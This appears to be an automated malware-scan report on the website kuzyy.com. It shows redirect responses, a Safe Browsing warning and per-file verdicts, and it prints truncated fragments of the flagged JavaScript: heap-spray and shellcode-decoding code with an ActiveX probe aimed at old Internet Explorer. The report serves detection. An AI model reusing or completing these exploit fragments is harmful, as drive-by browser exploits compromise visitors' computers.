Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kuzyy.com
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.kuzyy.com/ | HTTP/1.1 302 Found Connection: Close Location: /?WebShieldDRSessionVerify=slVNmy4j6Y6W93cPrYf6 Server: Safedog/4.0.0 Content-Length: 0 Content-Type: text/html | clean |
http://www.kuzyy.com/?webshielddrsessionverify=slvnmy4j6y6w93cpryf6 | HTTP/1.1 302 Found Connection: Close Location: /?webshielddrsessionverify=slvnmy4j6y6w93cpryf6&WebShieldDRSessionVerify=slVNmy4j6Y6W93cPrYf6 Server: Safedog/4.0.0 Content-Length: 0 Content-Type: text/html | clean |
http://www.kuzyy.com/?webshielddrsessionverify=slvnmy4j6y6w93cpryf6&webshielddrsessionverify=slvnmy4j6y6w93cpryf6 | HTTP/1.1 302 Found Connection: Close Location: /?webshielddrsessionverify=slvnmy4j6y6w93cpryf6&webshielddrsessionverify=slvnmy4j6y6w93cpryf6&WebShieldDRSessionVerify=w87z8JHWuOiEiv2XtjgX Server: Safedog/4.0.0 Content-Length: 0 Content-Type: text/html | clean |
http://www.kuzyy.com/?webshielddrsessionverify=slvnmy4j6y6w93cpryf6&webshielddrsessionverify=slvnmy4j6y6w93cpryf6&webshielddrsessionverify=w87z8jhwuoieiv2xtjgx | HTTP/1.1 200 OK Date: Thu, 22 May 2014 21:37:11 GMT Accept-Ranges: bytes ETag: "4def46ef8f2ccf1:4e980" Server: IIS Content-Length: 1884 Content-Location: http://www.kuzyy.com/Index.html Content-Type: text/html Last-Modified: Tue, 18 Feb 2014 09:58:12 GMT X-Powered-By: WAF/2.0 | clean |
http://www.kuzyy.com/index.html | 200 OK Content-Length: 1884 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var CutePower = anheywangma(AnHey.replace (/CUTEQQ/g,'%u'));
var CuteMoney = new Array()
var CuteShine = 0x86000 - CutePower.length*2;
var sss = Array(472,388,456,128,268,468,464,404,332,420,488,404,128,244,128,136,268,340,336,276,324,324,192,396,192,136,172,136,396,268,340,336,276,324,324,192,396,192,136,172,136,396,136,236,472,388,456,128,268,468,464,404,328,420,412,416,464,128,244,128,388,440,416,404,484,476,388,440,412,436,
} }
function ahwm() {
    var CuteLock = document.createElement("BODY");
    CuteLock.addBehavior("#default#userData");
    document.appendChild(CuteLock);
    try {
        for (i=0;i<10;i++) {
            CuteLock.setAttribute('s',window);
        }
    } catch(e) {}
    window.status+='';
}
document.getElementById("evilcute").onclick();
Antivirus reports:
http://www.kuzyy.com/pack.js | 200 OK Content-Length: 176 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
try {
    new ActiveXObject("cuteqq");
} catch (e) {
    var ANHEI='\x25'+'u5'+'8'+'5'+EasyJob;
    var woshiahwm="%u";
    var anheywangma=unescape;
}
Antivirus reports:
http://www.kuzyy.com/pack.css | 200 OK Content-Length: 4908 Content-Type: text/css | clean |
http://www.kuzyy.com/test404page.js | 200 OK Content-Length: 3169 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kuzyy.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: kuzyy.com
Referer: http://www.google.com/search?q=kuzyy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.